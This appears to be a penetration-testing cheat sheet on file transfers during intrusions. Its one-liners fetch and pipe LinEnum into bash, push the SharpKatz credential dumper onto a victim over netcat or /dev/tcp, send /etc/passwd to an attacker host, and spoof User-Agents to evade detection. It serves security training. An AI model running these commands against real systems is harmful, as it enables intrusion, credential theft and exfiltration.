File transfers (OS agnostic)
Table of Contents
Downloads#
Python#
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
PHP#
# using file_get_contents() and file_put_contents()
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
# using Fopen()
php -r 'const BUFFER = 1024; $fremote =
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
# using pipe to bash (needs `fopen` wrappers to be enabled in PHP)
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
Ruby#
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
Perl#
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
Netcat/Ncat#
Start a Netcat listener on the victim machine:
# victim
nc -l -p 8000 > SharpKatz.exe
ncat -l -p 8000 --recv-only > SharpKatz.exe
The --recv-only is needed for Ncat to close the connection once the file transfer is done.
Connect to the victim and upload SharpKatz.exe:
nc -q 0 <IP> 8000 < SharpKatz.exe
ncat --send-only <IP> 8000 < SharpKatz.exe
The -q 0 tells Netcat to close the connection once it finishes transferring the file.
For Ncat we can use --send-only: when used in both connect and listen modes, it prompts Ncat to terminate once its input is exhausted.
Sending a file as Input#
# attacker
sudo nc -l -p 443 -q 0 < SharpKatz.exe
sudo ncat -l -p 443 --send-only < SharpKatz.exe
# victim
nc <IP> 443 > SharpKatz.exe
ncat <IP> 443 --recv-only > SharpKatz.exe
Receiving a file from /dev/tcp#
If we don’t have Netcat/Ncat on the compromised machine, we can use bash and the /dev/tcp pseudo-device.
cat < /dev/tcp/<IP>/443 > SharpKatz.exe
Uploads#
💡 Assuming we have an
uploadserverrunning on out attack box
Python#
Using the requests module:
python3 -c 'import requests;requests.post("http://<IP>:8000/upload",files={"files":open("/etc/passwd","rb")})'
nginx with HTTPS#
There is nothing worse than being on a penetration test, and a client’s network IDS picks up on a sensitive file being transferred over plaintext and having them ask why we sent a password to our cloud server without using encryption.
# /etc/nginx/sites-available/upload.conf
server {
listen 9001;
location /SecureLocationButRenameIt/ {
root /var/www/uploads;
dav_methods PUT;
}
}
sudo mkdir -p /var/www/uploads/SecureLocationButRenameIt
sudo chown -R www-data:www-data /var/www/uploads/SecureLocationButRenameIt
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service
# if we get any errors
tail -f /var/log/nginx/errorl.log
We can also use ss or ps to check if TCP/80 is occupied. If that’s the case we can remove nginx’s default configuration, which binds on port 80:
sudo rm /etc/nginx/sites-enabled/default
Then we can upload files using curl:
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
💡 Why on
apache2?By default, with
Apache, if we hit a directory withoutindex.{php|html}, it will show a directory listing, which is not the case innginx.
RDP#
RDP is commonly used in Windows for remote access. In Windows, we can copy-paste using the RDP sesh.
In Linux, we can try to manually copy and paste using either xfreerdp or rdesktop, but this may not work under some circumstances. If that’s the case, we may start an RDP session with a local directory mounted on the target machine:
rdesktop <IP> -d DOMAIN -u administrator -p 'Password' -r disk:linux='/home/$(whoami)/mounted'
xfreerdp /v:<IP> /d:DOMAIN /u:administrator /p:'Password' /drive:linux,/home/$(whoami)$/mounted
We can access the directory by connecting to \\tsclient (in My Computer -> Network) allowing for both to- and from- file transfers.
We can also try the native mstsc.exe RDP client.
Encrypting File Transfers#
See file-encryption. Remember to use SSL-enabled transport method (HTTPS, SFTP etc.).
Detection#
User-Agents whitelist fed up into a SIEM tool
Obfuscation#
- Changing
User-Agent
For PowerShell:
# List User-Agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
# changing the User-Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
- Using living-off-the-land binaries